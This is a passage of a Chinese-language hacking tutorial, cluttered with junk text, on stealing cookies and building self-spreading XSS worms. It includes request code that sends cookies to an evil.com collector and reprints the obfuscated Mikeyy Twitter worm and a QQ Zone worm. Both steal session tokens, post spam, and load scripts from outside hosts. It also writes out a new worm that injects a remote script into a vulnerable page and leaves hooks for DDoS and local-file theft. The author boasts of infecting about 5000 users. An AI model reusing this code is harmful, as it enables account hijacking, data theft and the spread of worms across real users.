acl TRACE method TRACE
9 M3 o, ~- z0 b) _4 l" n- C
3 [1 f3 u: l7 c" O: K) Y...

http_access deny TRACE
复制代码突破还可以采用XmlHttp.setRequestHeader.通过setRequestHeader,把COOKIES等信息转向到目标页面.<script>

" z3 @# d9 m. z) e; G1 Pvar XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
8 k+ Y$ E$ k$ g' Y0 v
" B% i1 Q6 X$ o' T  UXmlHttp.open("GET","http://www.google.com",false);
' p! h6 t" V4 t. |9 `; [
( C& @0 M, ^0 \3 sXmlHttp.setRequestHeader("Host","www.evil.com/collet.php");
8 D( q6 f+ [; b: b2 ?' p1 _
XmlHttp.send(null);
% c9 ?7 ]5 g  M- ^9 L
( r6 P( a% e0 u! _% w( {</script>
. N  X/ q! o, c$ I1 f6 k复制代码当Apache启动了mod_proxy,还可以使用proxy方式作为中间人方式获得受保护COOKIES.<script>
5 V( j! R0 k; K/ M- J
- q  f8 O; s3 P9 F4 c7 Lvar XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
# X3 @3 O, P9 d; o1 p! w
3 H. M8 o% T2 @

XmlHttp.open("GET\thttp://www.evil.com/collet.php","http://www.vul.site/wherever",false);

XmlHttp.send(null);
( c% d/ M; Q: f
: [' }1 T7 f4 j8 f+ K1 r, I- u<script>
/ b0 Z$ m. [4 W, \9 Z. U) q  |0 a复制代码(IV) 综合性的高级XSS蠕虫:什么是XSS蠕虫,他的实现,传染,工作原理,常见作用都是什么.
0 @' Q% X; J# ~2 g复制代码案例:Twitter 蠕蟲五度發威
7 A0 J) q% r7 r6 O& I4 S5 D6 O第一版:
+ b* A; U% A% p) r2 T: k& P7 {  下载 (5.1 KB)
: e4 ~+ O8 q7 J) b
6 天前 08:27

' M) ?$ }& i( F$ X1 w  Y4 c3 a第二版:   1. var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "OST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update", "OST", "authenticity_token=", "&status=", "&return_rendered_status=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user=", "&tab=home&update=update", "/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=", "&commit=save+changes", "wait()""];  
, w9 e: Z. j9 ^
0 p9 I# A8 d' E7 T   2.   
8 [9 `. Z$ k6 h- L
   3. function XHConn(){  
0 i7 \: C4 v  L. N  x. q/ L9 p
  i) e' |: l# h6 B& b9 Y   4.   var _0x6687x2,_0x6687x3=false;  
  K# k9 B' P5 [8 S: B9 @
/ U' n" S) Y9 [$ \8 i   5.   try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }  

   6.   catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }  

# o9 P/ W. v+ \7 m1 {) }4 C   7.   catch(e) { try { _0x6687x2= new XMLHttpRequest(); }  

   8.   catch(e) { _0x6687x2=false; }; }; };  
  d: g8 }7 D2 Q+ K; _( T复制代码第六版:   1. function wait() {  

   2.   var content = document.documentElement.innerHTML;  
9 o" J: M) q" ?* N- d
   3.   var tmp_cookie=document.cookie;  
  F5 Y+ @7 _6 G1 |% j! t. t! E! ~( x7 h
3 R  Y, M/ y9 G4 b0 g7 m% l6 O   4.   var tmp_posted=tmp_cookie.match(/posted/);  

   5.   authreg= new RegExp(/twttr.form_authenticity_token = '(.*)';/g);  

   6.   var authtoken=authreg.exec(content);  

   7.   var authtoken=authtoken[1];  

$ D- L8 Y7 L8 {' L6 e   8.   var randomUpdate= new Array();  

   9.   randomUpdate[0]= "Be nice to your kids. They'll choose your nursing home. Womp. mikeyy.";  

  10.   randomUpdate[1]= "If you are born ugly blame your parents, if you died ugly blame your doctor. Womp. mikeyy.";  
9 P2 r  S0 {$ Y0 _% E, p4 r
  11.   randomUpdate[2]= "Every man should marry. After all, happiness is not the only thing in life. Womp. mikeyy.";  
* y4 u- ]! U% ?
8 k$ B( ]: A: N% h) O  12.   randomUpdate[3]= "Age is a very high price to pay for maturity. Womp. mikeyy.";  

* y: H8 N; ]2 ]) D% q3 q' m0 Z  13.   randomUpdate[4]= "Ninety-nine percent of all lawyers give the rest a bad name. Womp. mikeyy.";  
- Z% y* q2 ~8 L
  14.   randomUpdate[5]= "If your father is a poor man, it is your fate, but if your father-in-law is a poor man, it's your stupidity. Womp. mikeyy.";  
6 L. _1 y- d; m6 I8 f
$ T! F( h3 Z$ I7 t& ]; G% i  15.   randomUpdate[6]= "Money is not the only thing, it's everything. Womp. mikeyy.";  

( ^- C6 Z: M3 t" O! @  16.   randomUpdate[7]= "Success is a relative term. It brings so many relatives. Womp. mikeyy.";  

, P( x! I  h/ `! q) T  17.   randomUpdate[8]= "'Your future depends on your dreams', So go to sleep. Womp. mikeyy.";  
. H$ n) ^# p8 n$ S8 v
4 e1 h& @2 b* a3 U# ^; w; y  18.   randomUpdate[9]= "God made relatives; Thank God we can choose our friends.Womp. mikeyy.";  

  19.   randomUpdate[10]= "'Work fascinates me' I can look at it for hours ! Womp. mikeyy.";  

  20.   randomUpdate[11]= "I have enough money to last me the rest of my life. (unless I buy something) Womp. mikeyy.";  
- k, O, A4 n( i- l1 Q
  21.   randomUpdate[12]= "RT!! @spam Watch out for the Mikeyy worm [url]http://bit.ly/XvuJe";  
6 T. K: }3 g1 t# T" r$ g5 W8 J/ h
0 Z$ Q. E1 g( V# C4 ?) j  22.   randomUpdate[13]= "FUCK. NEW MIKEYYY WORM! REMOVE IT: http://bit.ly/fuSkF";  
1 _1 O  P% a. M1 [1 q# b: `2 H
% V5 V6 O) k# f6 ~6 i6 R  23.   randomUpdate[14]= "Mikeyy worm is back!!! Click here to remove it: http://bit.ly/UTPXe";  
6 s+ q- l( p1 R- Z7 l4 n* I
  24.     

  25.   var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];  

+ }. L/ _' p4 m' J' H  H  26.   var updateEncode=urlencode(randomUpdate[genRand]);  

  27.     
! @8 g( R1 `' }4 ~$ ^1 I: U# y6 N
4 _8 {* Z7 g; p4 ^' p2 V7 A  28.   var ajaxConn= new XHConn();  

3 z* A  e( X7 y( t" W  J$ m  29.   ajaxConn.connect("/status/update","OST","authenticity_token="+authtoken+_"&status="+updateEncode+"&return_rendered_status=true&twttr=true");  

$ S! L7 O, u' _- y( P( ?  30.   var _0xf81bx1c="Mikeyy";  
; M; w& g: j8 W* e5 R/ E
  31.   var updateEncode=urlencode(_0xf81bx1c);  
" Q  b8 S+ k* H& Q" A4 y
  32.   var ajaxConn1= new XHConn();  

  33.   ajaxConn1.connect("/account/settings","OST","authenticity_token="]+authtoken+"&user[name]="+updateEncode+""+updateEncode+"&user[description]="+updateEncode+"&user[location]="+updateEncode+"&user[protected]=0&commit=Save");  
5 ?, f9 {$ f4 N% ^2 ?# M
) y/ Q3 i1 a/ J/ m' C' E4 }$ Z+ k  34.   var genXSS="000; }  #notifications{width: expression(document.body.appendChild(document.createElement('script')).src='http://runebash.net/xss.js');) #test { color:#333333";  
2 Z9 o: z- v8 ~8 X6 V9 @* B
  35.   var XSS=urlencode(genXSS);  

0 u  ?4 e- j+ H2 I+ [3 k- ?# h0 B' A3 q  36.   var ajaxConn2= new XHConn();  

# g4 ~; w- \! \* P4 e; ^: m) ^/ z  37.   ajaxConn2.connect("/account/profile_settings",""OST,"authenticity_token="]+authtoken+"&user[profile_sidebar_fill_color]="+XSS+"&commit=save+changes");  
$ J! D! c' |. U- Z
  38.     
: B* T* O, t! X
1 P* j" n6 @8 q' e) O  39. } ;  
, f( Q  C3 b; X4 l9 w
  40. setTimeout(wait(),5250);  
复制代码QQ空间XSSfunction killErrors() {return true;}
, l5 @$ H2 g9 N
window.onerror=killErrors;



var shendu;shendu=4;

; x5 w. ]1 ^$ Y0 L. O- S% z8 \//---------------global---v------------------------------------------

; f4 p: d6 k3 P3 s//通过indexOf函数得到URL中相应的字符串，用于判断是否登录的吧？
+ u1 z; j3 `/ B5 @$ Y5 P
var visitorID;var userurl;var guest;var xhr;var targetblogurlid="0";

0 R% ^, H! Q4 ^# m% m0 v; O: b1 t% Evar myblogurl=new Array();var myblogid=new Array();

! h% o7 ^. a$ _' g        var gurl=document.location.href;
5 B  B+ y# S: a# a
2 o2 ?% f9 ]% T" `$ D9 k        var gurle=gurl.indexOf("com/");
3 ^3 d5 ]; r2 t5 S
- |+ r  K' X) D& ^. N2 S0 K        gurl=gurl.substring(0,gurle+3);        
/ C: l- Q0 I' U7 @) @
        var visitorID=top.document.documentElement.outerHTML;
8 p! V  Y0 e: L0 g
           var cookieS=visitorID.indexOf("g_iLoginUin = ");
: e7 K; V. X  Y/ Z
! G* z! N  r1 K5 u7 f  n" u        visitorID=visitorID.substring(cookieS+14);

' q/ F3 N0 ]* i7 e' a8 a% c1 n% s        cookieS=visitorID.indexOf(",");
' C$ \6 W, a) A0 X% A  d- H
7 Q6 K8 j; X" k6 X' ^        visitorID=visitorID.substring(0,cookieS);
( I& S' ?  `, l, z2 h- Q# `
+ D" d* W! j5 \( U/ z        get_my_blog(visitorID);

. g# L/ W2 l( k* i8 e8 F- ?        DOshuamy();
! M! R, P, V5 a4 a" M! m
7 E# f; E5 s* X/ M$ N, L0 s  h+ Z

$ q% ~. X' m0 k4 S. C- W% {' d//挂马

function DOshuamy(){
; x, g9 b, f9 H6 M5 a1 r
0 d+ ^' u8 v/ T" Yvar ssr=document.getElementById("veryTitle");

ssr.insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://www.xxx.com/1.html'></iframe>");
, e- O3 q% M# E6 B$ M( f" q
}


: r5 N4 B6 S2 y0 i, b% _6 q; Y
3 X+ h* c4 L7 w( p; r//如果创建XMLHttpRequest成功就跳到指定的URL去，这个URL是干什么的就不知道了，没看过，刷人气？

function get_my_blog(visitorID){
' {0 @: \2 i9 t
$ w2 f% o$ N# ]) A& B   userurl=gurl+"/cgi-bin/blognew/blog_output_toppage?uin="+visitorID+"&direct=1";

   xhr=createXMLHttpRequest();    //创建XMLHttpRequest对象

   if(xhr){    //成功就执行下面的
3 _: H/ D) s' f( R* t
     xhr.open("GET",userurl,false);    //以GET方式打开定义的URL

" p9 p& Z) c* h! M5 X0 A2 Y* C     xhr.send();guest=xhr.responseText;
4 v) r5 \0 E/ [. P* {
. |% k3 E& d$ {# L     get_my_blogurl(guest);    //执行这个函数

    }
2 q# t; g! {, ^$ D" V2 m
. P7 P! K( D* u$ {1 s}

6 p0 T. q' ]* g7 u: O: M# G/ w
; B1 M5 r7 M6 H1 B$ H' Q6 h2 W% Q
//这里似乎是判断没有登录的
3 e4 N! B' V  k! J( O+ Y& J8 h1 d
6 h$ L" U' h% M& Ofunction get_my_blogurl(guest){
; j9 g, y# V  U. t' g8 [( i! o6 l
; h& I9 w5 E# N+ u. I1 T  var mybloglist=guest;

  var myurls;var blogids;var blogide;

4 _# Z0 @. l" _  for(i=0;i<shendu;i++){
6 W8 b& z6 r9 l" S# B. P
     myurls=mybloglist.indexOf('selectBlog(');    //查找URL中"selectBlog"字符串，干什么的就不知道了
2 c0 e. F( l, t5 @# A
% h/ y9 G3 r7 o$ S5 y' }; f     if(myurls!=-1){    //找到了就执行下面的

         mybloglist=mybloglist.substring(myurls+11);
" c. i" e. y$ K5 L+ w$ j, q" U
         myurls=mybloglist.indexOf(')');
4 k+ [! [& f& X9 M" Q) ]- l
         myblogid=mybloglist.substring(0,myurls);

. a& S9 l+ F* K, y+ Y        }else{break;}
; a2 |# j! a. W* q$ z5 h/ G2 r
! y( ~8 H4 p1 h2 ^0 w7 y}

get_my_testself();    //执行这个函数
4 [! l# @6 S+ o6 E  t! p  K
}
1 u3 M& R1 m" M" J& s% s( k' [
% q9 j! G1 r% R$ x) [
- m2 U, G. a1 S! D8 T1 |8 r# q
" u% U) ]7 J* @4 l//这里往哪跳就不知道了
  Y" j; C  N  ?
6 V1 @0 s! d% s! }& Z/ X, Wfunction get_my_testself(){
) J+ ~/ }3 q# S5 ?# f; D" n5 J
  for(i=0;i<myblogid.length;i++){    //获得blogid的值

      var url=gurl+"/cgi-bin/blognew/blog_output_data?uin="+visitorID+"&blogid="+myblogid+"&r="+Math.random();
' O4 R- m1 u8 _% E
$ D1 n5 r0 g8 K      var xhr2=createXMLHttpRequest();    //创建XMLHttpRequest对象
; U5 D. }+ j% ^$ z
) Z# a7 Y2 {4 d* x* C6 y2 |! H& h      if(xhr2){        //如果成功
9 m, x. h1 L  ^7 ~% F, o9 {2 P
& p9 \$ ^$ Z! [2 L              xhr2.open("GET",url,false);     //打开上面的那个url

              xhr2.send();

8 Q4 G. t- _/ O8 _              guest2=xhr2.responseText;
3 }/ ~6 S+ M' l4 g# ?5 v& z; g9 p1 X9 t
              var mycheckit=guest2.indexOf("baidu");    //找"baidu"这个字符串，找它做什么？
& y8 \7 M' V8 U* T4 `- o( W- ~
              var mycheckmydoit=guest2.indexOf("mydoit"); //找"mydoit"这个字符串
; L# l- W7 p" \5 ~* b7 A- z
              if(mycheckmydoit!="-1"){    //返回-1则代表没找到
( d9 S" |9 Y' ^. @! q3 y0 j
                targetblogurlid=myblogid;   

. p4 Z8 C  D7 J: V                add_jsdel(visitorID,targetblogurlid,gurl);    //执行它
1 J2 N& _3 N0 \2 L0 k5 p
                break;

! n* t6 y! c. m" I% x+ R, w               }

: B5 v6 W( E% G- I7 o              if(mycheckit=="-1"){

                targetblogurlid=myblogid;
8 \) D7 ]4 l, d' R  u' U, |7 ?
: x- q# a" q$ G6 r7 t! z                add_js(visitorID,targetblogurlid,gurl);    //执行它
. v9 _, ^  f. G# C( e( J0 Q
                break;
% q. c: y0 p; p: X5 w; @
               }

        }      
* u; F' K! Q  g+ m* O
}
/ H- O$ v" P' o  h
9 o3 O  v; d5 N0 @( C) V}
7 |. ^+ S- _- W1 C$ |7 {" l  J
+ M& `1 g, M& t: [& p

* `/ G( c" U$ v8 a0 Z6 q6 V//--------------------------------------  
# |  F+ r6 T5 _7 n# L
//根据浏览器创建一个XMLHttpRequest对象
" `2 \1 R) u% s
% ?! \' l" z5 X$ A; Hfunction createXMLHttpRequest(){

    var XMLhttpObject=null;  

    if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}  

5 N: A/ v, n5 a* E8 t    else  
0 N  p3 D' x: ]' y( K2 f
      { var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];        
  D- S; P# t* M! w+ Q, o
        for(var i=0;i<MSXML.length;i++)  

        {  

% |( B: L5 c2 G  f0 Y1 z& Y            try  

            {  
% Z( x/ @, J& G3 h; g* }5 X
                XMLhttpObject=new ActiveXObject(MSXML);  
, c2 _/ f+ B% L5 U: y
( u. G# i4 l+ K1 S  D                break;  

9 B7 D, l$ t6 e            }  
$ l$ V0 y; `7 b& d/ Y% B
' t, R! y3 m% W  B            catch (ex) {  

/ z# z, f) R$ _# F% P: J            }  
: w) m9 N$ Z& i
         }  

      }

return XMLhttpObject;
6 w2 g; P6 z; h7 X/ m; y
}  

4 u2 x/ P! V  A

' S$ }* {) o& ]//这里就是感染部分了
6 t- I" N  g# T" D" V
5 Q& J& ]. |8 _7 S( A9 f$ {& efunction add_js(visitorID,targetblogurlid,gurl){
7 \4 e+ K/ O* n5 A* F
var s2=document.createElement('script');
( t: L; F4 q+ K! `- U- L# ~
$ ]8 g9 d, B) A) p2 T5 Ps2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/index.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();

# a/ p3 e5 O2 Y" J. h+ p3 l2 \1 ws2.type='text/javascript';
  B% m6 N  u3 N/ b) A
0 q4 `: E/ @0 X6 _; sdocument.getElementsByTagName('head').item(0).appendChild(s2);
( E; ?  B& u. K" ?' _3 w, K
}
( L1 K1 e" ~0 x! j$ U
0 J! L# @  x) E7 x& U& E

+ x2 {# _' F9 h; t6 F/ Xfunction add_jsdel(visitorID,targetblogurlid,gurl){

# ?  J/ Y9 I4 X3 ]5 ~var s2=document.createElement('script');

" B1 n: Z' \- ~s2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/del.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();

s2.type='text/javascript';

: v, a, h. G3 z5 I5 }  f9 {7 Q3 ]document.getElementsByTagName('head').item(0).appendChild(s2);

}
复制代码通过以上几个蠕虫,我们可以总结蠕虫的工作原理为:
1:首先写入调用蠕虫代码到一个存在XSS漏洞的位置(在非长久性XSS漏洞里,我们也可以通过把短暂性的XSS连接通过各种传播方式,发送给其他用户,当某个用户中了XSS后,再通过蠕虫,向其好友发送同一短暂性XSS连接.)

1 G! V" W; o1 S# E, X- I2 b5 n2:受害用户在登陆状态中,观看了存在XSS的问题页面,JS执行,并植入XSS蠕虫代码到该用户帐户中,且通过搜索好友等方法,传播给其他用户.即复制感染过程.(在论坛或者回复类型页面中传播XSS蠕虫,只要保证每页面同时存在2个或者以上蠕虫,就可以保证蠕虫不会被增加的数据覆盖.)

3 B! F+ v6 @. t7 ~$ k; L综上所述,结合以上种种技巧,就可以创造我们自己的XSS蠕虫了.在我们的蠕虫里,我们可以添加截取屏幕功能,DDOS功能,可以判断客户端浏览器的版本,读取并且发送客户端的本地文件~
7 D: N# g$ y# R  }, B( v/ F9 i9 o
- R  @/ w4 h. r7 _9 O; |' ?  Q
下面,我们来初步写一个简单主体蠕虫,并且预留可添加功能的地方.
7 `' j7 ]2 N4 i4 ^" e( c' @
6 A: N! \  e6 {3 \首先,自然是判断不同浏览器,创建不同的对象var request = false;
" _, J, T, E' l, {5 `
! G: \" Q5 o0 s* c0 c9 kif(window.XMLHttpRequest) {
& P# k/ x) k8 C: K8 |; u
" F; X: t* c) `( {request = new XMLHttpRequest();

if(request.overrideMimeType) {

request.overrideMimeType('text/xml');
" z. u$ w2 p& K5 a
/ R$ i$ g  m" q2 T# Y! O2 s+ M1 F}

4 F- a6 C$ V, z} else if(window.ActiveXObject) {

4 S( N( G6 Z* ^: t% Q. W! vvar versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

for(var i=0; i<versions.length; i++) {

# a' ^+ T' ]! t# S! s/ vtry {
1 W' _- f, k3 p9 g8 q
request = new ActiveXObject(versions);

} catch(e) {}

}

}

xmlHttpReq=request;
复制代码可以此时添加判断浏览器具体型号和版本:   function browserinfo(){

        var Browser_Name=navigator.appName;

$ J. k) E3 J( K4 n3 w        var Browser_Version=parseFloat(navigator.appVersion);
; c6 S, o1 n- {
        var Browser_Agent=navigator.userAgent;

$ q4 Y: F2 j! E% Q0 F' Z        
+ k3 Q9 T$ |  O2 @5 k1 O8 r
; B2 q3 W* ]3 _  U        var Actual_Version,Actual_Name;
! T! S0 g: K8 Y% _' {8 D% a' q# N1 G1 V
        

        var is_IE=(Browser_Name=="Microsoft Internet Explorer");

. T: E( |5 h2 G5 u, ?        var is_NN=(Browser_Name=="Netscape");
. w7 C% v2 e$ J8 f) V" q' @
        var is_Ch=(Browser_Name=="Chrome");
8 G9 s8 n+ F8 G8 l; ~6 J( R
2 _1 W2 @0 O; W4 X        

) i8 g, y0 `/ F        if(is_NN){
* g& T- n9 G* F( }2 v  P" E
6 ~7 u9 O. u" {2 D8 D( `8 C            if(Browser_Version>=5.0){

                var Split_Sign=Browser_Agent.lastIndexOf("/");
# X9 J5 k+ [! z# L
+ z& f0 i, P' f! Y3 N                var Version=Browser_Agent.indexOf(" ",Split_Sign);

                var Bname=Browser_Agent.lastIndexOf(" ",Split_Sign);

. n: @7 k: d3 {' j$ k
7 B5 y/ s% o$ j' B* H; o
, }+ |! t7 H8 Y/ ^                Actual_Version=Browser_Agent.substring(Split_Sign+1,Version);
6 Q# ?5 G9 c  A2 Z
                Actual_Name=Browser_Agent.substring(Bname+1,Split_Sign);

            }
9 U3 U2 J. j7 A0 X+ r( l4 o: l
            else{
6 U, U' J# U3 \; j8 q, v
                Actual_Version=Browser_Version;
0 z7 w) i$ [  H$ B: t6 `
                Actual_Name=Browser_Name;
7 h" Q& U) |! d( y6 s5 ~
            }

* G4 A7 Q2 E% B% L5 V        }

        else if(is_IE){
6 S/ g4 |4 o! \( a9 u3 o" p
' P, o9 x% T+ s2 d6 A) n5 P: Q            var Version_Start=Browser_Agent.indexOf("MSIE");

            var Version_End=Browser_Agent.indexOf(";",Version_Start);
$ b& n- ]9 z  R
            Actual_Version=Browser_Agent.substring(Version_Start+5,Version_End)

' {2 f. F/ e( [" l            Actual_Name=Browser_Name;

            

            if(Browser_Agent.indexOf("Maxthon")!=-1){
& ^3 `. g' D3 e, _6 Q" G
5 V& Q- r. d2 F- d, |( w( h                Actual_Name+="(Maxthon)";
# q' s7 j* @# ?* T4 t! b6 y2 V
; Y( M' ]; G' `) k" Y% ^            }

# n: B' A/ ?8 J+ J            else if(Browser_Agent.indexOf("Opera")!=-1){

                Actual_Name="Opera";

3 ?' X, p- @' b9 n: R4 D( _  N8 t- c                var tempstart=Browser_Agent.indexOf("Opera");

+ W( Y6 K9 B& h                var tempend=Browser_Agent.length;
, ^$ X  Z; v1 h" s1 S& |) t7 U
2 }9 p9 o. `, i+ X. e. {. v8 h1 ]                Actual_Version=Browser_Agent.substring(tempstart+6,tempend)

            }
# [1 K8 p' ]+ B! U
        }

        else if(is_Ch){

            var Version_Start=Browser_Agent.indexOf("Chrome");
# A$ v, S( _" g
            var Version_End=Browser_Agent.indexOf(";",Version_Start);
1 V1 o% E& E& x7 G4 r
            Actual_Version=Browser_Agent.substring(Version_Start+5,Version_End)

            Actual_Name=Browser_Name;

8 t# Q& X& X" L5 I3 H+ A            

            if(Browser_Agent.indexOf("Maxthon")!=-1){

                Actual_Name+="(Maxthon)";
/ {" E: S; A2 N% e2 ~" E) Q
' i1 x- {- C6 _$ b' g, B            }
4 {0 M$ {5 j$ P2 ~5 R- c
& |, Q( H1 [( y- m# [: J3 [            else if(Browser_Agent.indexOf("Opera")!=-1){
' o+ o. i+ W  F9 \
                Actual_Name="Opera";
  J8 q' J( W7 G- A( x! ]6 s% r
& u2 U: ^! Z* S: ^) x+ W                var tempstart=Browser_Agent.indexOf("Opera");
( j  d' a2 H; _
                var tempend=Browser_Agent.length;

& r+ O7 C8 E7 X% q. @& {4 U, y                Actual_Version=Browser_Agent.substring(tempstart+6,tempend)
& o  ~5 x. J1 R9 d8 z
! l" h' _. n8 N. v1 O8 W8 J8 _            }
9 U+ @' f) F! M) B; \. H* w& K
        }

        else{
9 I0 l) g# }8 M0 Z
- G- h! E  D! i( p8 ~# `' D5 ]            Actual_Name="Unknown Navigator"
  i8 `% {1 B: @! G
$ d1 K( O0 W7 u  N9 W, h            Actual_Version="Unknown Version"

        }
0 U- v& g$ c( [0 i* D4 N( T


* p* X3 Y2 L* ^+ s+ t( H0 ?        navigator.Actual_Name=Actual_Name;

        navigator.Actual_Version=Actual_Version;
7 S2 a( c; Z* z
        

        this.Name=Actual_Name;
$ R) E' _) U4 Y) v
8 [) s$ x4 r0 j$ b        this.Version=Actual_Version;
, n. [5 x* x" n0 N3 H
    }

    browserinfo();
/ t, S2 j/ _8 \: o* K. W
    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Miscrosoft Internet Explorer"){//调用IE读取本地敏感文件}
0 k* [' P" N: E
% D. _7 c2 ]9 J, U3 B& t* L+ ^    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Fire fox"){//调用Firefox读取本地敏感文件}
: ?1 T* t) V: A
    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Opera"){//调用Opera读取本地敏感文件}

    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Google Chrome"){//调用Google Chrome读取本地敏感文件}
复制代码随后可以选择调用镜象网页并且发送功能.参考上面的镜象代码
复制代码随后可以选择调用DDOS功能.参考上面的DDOS代码
复制代码然后,在感染和传播功能发作之前,我们要判断当前页面有没有蠕虫存在,如果有,有多少只.如果虫的数量足够,我们就不要再植入蠕虫了.只要保证一定的数量就好.xmlHttpReq.open("GET","http://vul.com/vul.jsp", false);  //读取某页面.

% T+ v! ~, X8 u$ RxmlHttpReq.send(null);
% Q( h  e4 x: c
var resource = xmlHttpReq.responseText;
8 X& v/ j5 K* G) u4 L- K
var id=0;var result;
6 W& u) i9 J8 Z
var patt = new RegExp("bugbug.js","g");     //这里是蠕虫的关键词,用以确定页面有多少只虫.譬如如果你的虫在bugbug.js,那么就可以搜索这个JS在页面内的数量.

while ((result = patt.exec(resource)) != null)  {
9 I) B- B3 T* b) i9 v! f
) J' R8 j; y; F/ P) y' u+ h  Cid++;
' V" r7 s! u+ j
( v& t1 c. R! k% D) s}
- R6 u: F) D% E! g; Z  h复制代码然后,我们根据数量,来做下一步的操作.先判断,如果数量太少,我们就要让蠕虫感染起来.if(id<2){     //这里我们假设要求那个页面蠕虫的数量要有2只.

no=resource.search(/my name is/);
2 v6 \$ H4 N0 g7 u5 p
var wd='<script src="http://www.evil.com/bugbug.js"</script>';        //wd是存在XSS漏洞的变量.我们在这里写入JS代码.
( P) a; q# h  y0 U3 o
1 h4 Y$ t' ^+ ~- Y( Cvar post="wd="+wd;

0 z) A0 e* e& w6 i; L9 QxmlHttpReq.open("OST","http://www.vul.com/vul.jsp",false);        //把感染代码 POST出去.
; k4 G0 g/ y7 H4 L
; r+ e) p8 K7 _% b$ Z( Y9 WxmlHttpReq.setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
$ }, d0 s  ~% U
" W; k0 l  J, A) [) `* n0 F. F2 ?5 D! ZxmlHttpReq.setRequestHeader("content-length",post.length);
- l" p/ t2 H4 ?" V: o  d
xmlHttpReq.setRequestHeader("content-type","application/x-www-form-urlencoded");

  [. V5 k0 G; V" a* O. f; I8 H% UxmlHttpReq.send(post);

* \, |" \$ R4 \0 ^" U}
3 K8 A! t5 f) _" O# K- m/ O+ K复制代码如果虫的数量已经足够,那么我们就执行蠕虫:else{
! l! J: ~. `; u+ ?$ D2 y8 L/ @
6 [) Q, H( Q7 y/ R& xvar no=resource.search(/my name is/);     //这里是访问一个授权页面里,取得用户的名称.备份,并将来用在需要填写名称的地方

var namee=resource.substr(no+21,5);     //这里是重组用户名,条件是随便写的.具体情况当然要不同获得.

2 F, v7 t- g1 z8 a& N  b: b5 ovar wd="Support!"+namee+"<br>";        //这里就发出去了一个你指定的MESSAGE.当然,你可以把数据存入一组数组,random读取.

var post="wd="+wd;
8 t3 ^. ?' y# Y) o3 X# V
0 i) _- _* S$ S; N, e$ j8 I0 JxmlHttpReq.open("OST","http://vul.com/vul.jsp",false);
6 y- ^8 `5 o% n
( L/ q; I2 E7 `1 X8 H2 zxmlHttpReq.setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
4 d( c! ~  H( _$ Y1 c9 Q4 W
xmlHttpReq.setRequestHeader("content-length",post.length);
6 ]9 |, |# {6 j; x3 Z( Y
xmlHttpReq.setRequestHeader("content-type","application/x-www-form-urlencoded");

- v. _2 u1 {. K1 v% ixmlHttpReq.send(post);                 //把传播的信息 POST出去.
0 x3 q( M+ N, k& J' Q/ M+ N" u
}
复制代码-----------------------------------------------------总结-------------------------------------------------------------------
) |+ ^" Q# y0 @
: `2 }# G4 P4 Q
2 f" f" n" v2 K$ b
本次教程案例中的蠕虫曾经测试成功并且感染了约5000名用户.
: B( k+ z" d- c蠕虫仅仅是一个载体,在这个载体上,我们可以实现各种各样的功能.
